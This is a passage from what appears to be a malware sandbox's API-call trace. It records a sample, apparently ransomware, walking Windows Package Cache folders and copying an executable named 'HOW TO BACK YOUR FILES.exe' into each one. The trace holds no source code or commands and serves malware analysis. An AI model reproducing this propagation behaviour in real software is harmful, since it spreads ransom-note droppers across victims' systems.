lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.012] GetLastError () returned 0x0 [0090.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.012] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.012] CloseHandle (hObject=0x120) returned 1 [0090.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.012] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.013] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x5aa214e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5aa214e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.013] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.013] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.013] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" [0090.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3508 | out: hHeap=0x2b0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0090.013] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned 88 [0090.013] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" [0090.013] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.013] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.014] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.014] GetLastError () returned 0x0 [0090.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.014] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.014] CloseHandle (hObject=0x120) returned 1 [0090.014] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.014] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.014] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x5af303a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5af303a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.014] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.014] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.014] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0090.014] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3448 | out: hHeap=0x2b0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0090.014] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 88 [0090.014] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0090.015] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.015] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.015] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.015] GetLastError () returned 0x0 [0090.015] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.015] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.015] CloseHandle (hObject=0x120) returned 1 [0090.016] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.016] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.016] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x5b229f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5b229f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.016] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.016] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.016] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" [0090.016] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3388 | out: hHeap=0x2b0000) returned 1 [0090.016] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0090.016] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned 88 [0090.016] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" [0090.016] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.016] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.017] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.017] GetLastError () returned 0x0 [0090.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.017] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.017] CloseHandle (hObject=0x120) returned 1 [0090.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.017] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.017] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x5cbe6d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5cbe6d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.017] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.017] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.017] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" [0090.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4330 | out: hHeap=0x2b0000) returned 1 [0090.018] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" [0090.018] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.018] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.018] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.018] GetLastError () returned 0x0 [0090.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.018] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.018] CloseHandle (hObject=0x120) returned 1 [0090.019] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.019] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc63fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.019] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.019] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.019] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" [0090.019] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" [0090.019] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.019] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.020] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.020] GetLastError () returned 0x0 [0090.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.020] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.020] CloseHandle (hObject=0x120) returned 1 [0090.020] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.020] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4bc8a100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc8a100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.020] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.020] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.021] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" [0090.021] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" [0090.021] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.021] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.021] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.022] GetLastError () returned 0x0 [0090.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.022] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.022] CloseHandle (hObject=0x120) returned 1 [0090.022] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.022] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x5d0cfa60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d0cfa60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.022] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.022] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.023] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" [0090.023] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" [0090.023] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.023] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.023] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.024] GetLastError () returned 0x0 [0090.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.024] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.024] CloseHandle (hObject=0x120) returned 1 [0090.024] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.024] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bcd63c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bcd63c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.024] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.024] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.024] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" [0090.024] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" [0090.024] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.024] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package 